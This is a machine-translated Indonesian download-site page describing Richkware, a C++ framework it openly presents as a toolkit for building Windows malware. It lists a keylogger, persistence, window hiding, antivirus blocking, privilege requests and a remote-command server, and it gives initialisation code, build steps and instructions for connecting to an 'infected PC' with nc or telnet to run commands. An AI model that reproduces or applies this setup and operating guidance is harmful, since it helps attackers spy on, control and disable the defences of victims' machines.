Beranda>Terkait pemrograman>C/C++
Unduh

Richkware

Kerangka kerja untuk membangun malware Windows, ditulis dalam C ++.

Keterangan

Richkware adalah perpustakaan fungsi jaringan dan OS, yang dapat Anda gunakan untuk membuat malware. Komposisi fungsi -fungsi ini memungkinkan aplikasi untuk mengasumsikan perilaku yang dirujuk ke jenis malware berikut:

  • Virus
  • Cacing
  • Bot
  • Spyware
  • Keylogger
  • Scareware

Proyek terkait

Richkware-Manager-Server: Layanan untuk manajemen host di mana hadir sebagai contoh malware yang dikembangkan menggunakan kerangka kerja Richkware .

Richkware-Manager-Client: Klien Richkware-Manager-Server , bahwa ia memperoleh daftar semua host dari server dan dapat mengirim segala jenis perintah kepada mereka.

Dokumentasi

En DIA
Presentasi Pdf Pdf
Laporan Pdf Pdf

Fungsi

Jaringan

  • Server ( Network.H ): Modul untuk manajemen server multi-thread, yang memungkinkan untuk menerima perintah dari Internet (Richkware-Manager-Client atau Console) sesuai dengan protokol spesifik.
    • Protokol ( Protokol.H ):
      1. Eksekusi Perintah Jarak Jauh (ID 1)
      2. (Bekerja sedang berlangsung)
  • Network ( Network.H ):
    • RawRequest : Kirim permintaan ke server;
    • Unggahinfotorchkwaremanagerserver : kirim informasi ke richkware-manager-server

Sistem

  • Penyimpanan ( Storage.H ):

    • Savesession and Loadsession : Simpan status aplikasi (dienkripsi) ke:
      • Daftar (Savevaluereg dan LoadValuereg)
      • File (SaveValuetofile dan LoadValuefromFile)
    • Kegigihan : Pasang dirinya secara permanen dalam sistem.

  • IsAdmin dan RequestAdminPrivileges ( Richkware.H ): Periksa dan memerlukan hak administrator;

  • StealthWindow ( Richkware.H ): Sembunyikan aplikasi;

  • OpenApp ( Richkware.H ): Aplikasi Buka Arbitrer;

  • KeyLogger ( Richkware.H ): Menyimpan dalam file semua tombol yang ditekan;

  • Blockapps e unblockapps ( blockapps.h ): aplikasi blok dan unblock (antivirus, ...).

Kriptografi

  • Enkripsi dan Dekripsi ( Crypto.H ): RC4 (default), blowfish.
  • Encode dan decode ( crypto.h ): base64 (defualt), hex.

Lainnya

  • Randmouse ( Richkware.H ): Bergerak secara acak kursor mouse;
  • Hibernasi ( Richkware.H ): Sistem Hibernate.

Persyaratan

Ini adalah persyaratan dasar untuk membangun dan menggunakan Richkware:

  • Membuat atau cmake
  • Mingw

Mulai

Buka Main.cpp, dan buat instance Richkware.

Dengan Richkware-Manager-Server

Jika Anda telah menggunakan RMS, Anda dapat menginisialisasi malware sebagai berikut: 

    int main() {
           Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
            ...
            return 0;
        }

bahwa ia mendapatkan kunci yang aman dari Richkware-Manager-Server dan mengatur kunci sebagai kunci enkripsi. DefaultPass digunakan sebagai kunci enkripsi sementara untuk memastikan komunikasi yang aman dengan RMS dan jika malware tidak dapat mencapai RMS untuk mendapatkan ketrkripsi KET, ia akan menggunakan DefaultPass sebagai kunci enkripsi.

Tanpa Richkware-Manager-Server

Jika tidak, jika Anda belum menggunakan RMS, Anda dapat menggunakan: 

 Richkware richkware("Richk","richktest");

Dengan cara ini, ia menggunakan "Richktest" sebagai kunci enkripsi.

Menyusun

Setelah implementasi Main.cpp , Anda dapat mengkompilasi sebagai berikut.

Menggunakan Mingw untuk Windows atau Mingw Cross Compiler untuk Linux Build Environment 

 make

Menggunakan Microsoft C ++ Compiler (Visual Studio)

  • C/C ++> Preprocessor> Definisi Preprocessor, tambahkan "_crt_secure_no_warnings"
  • Linker> Input> Dependensi tambahan, tambahkan "WS2_32.LIB"

Contoh Penggunaan

Dalam contoh berikut, kami memanggil " server ", malware yang dikembangkan menggunakan kerangka kerja Richkware dan di mana ia telah mengaktifkan fungsi untuk membuat server, dan " klien ", pencipta (peretas) malware yang mencoba membuat koneksi dengan PC yang terinfeksi.

Sisi server

Eksekusi Perintah Jarak Jauh

Fungsi Kerangka Panggilan starterver di utama, ia memulai server pada port, dalam contoh berikut adalah port TCP 8000. Ingatlah bahwa jika port sudah digunakan oleh program lain, Anda tidak dapat menggunakan port itu, sampai program akan dihentikan. 

 int main () {
    ...
	richkware.network.server.Start("8000");
    ...
}

Sisi klien

Hubungkan menggunakan Richkware-Manager-Client

Di semua sistem di mana mesin virtual Java diinstal, Anda dapat menggunakan Richkware-Manager-Client, jika tidak jika tidak ada, Anda dapat dengan mudah menggunakan terminal.

Terhubung menggunakan terminal dalam sistem unix

Dalam sistem UNIX, Anda dapat menggunakan NetCat , dan menjalankan perintah berikut: 

 nc <serverName> 8000

Jika server menerima permintaan pada port terbuka dan berhasil membuat koneksi, itu menanggapi klien yang mengkonfirmasi pembentukan koneksi, setelah itu, Anda dapat menulis: 

 [[1]]COMMAND

di mana perintah adalah perintah yang harus dieksekusi pada host yang terinfeksi di mana server berjalan.

Hubungkan menggunakan terminal di windows

Di Windows, Anda dapat menggunakan telnet , dengan cara yang sama: 

 telnet <serverName> 8000

... 

 [[1]]COMMAND
Memperluas
Informasi Tambahan
Aplikasi Terkait
Direkomendasikan untuk Anda
Informasi Terkait Semua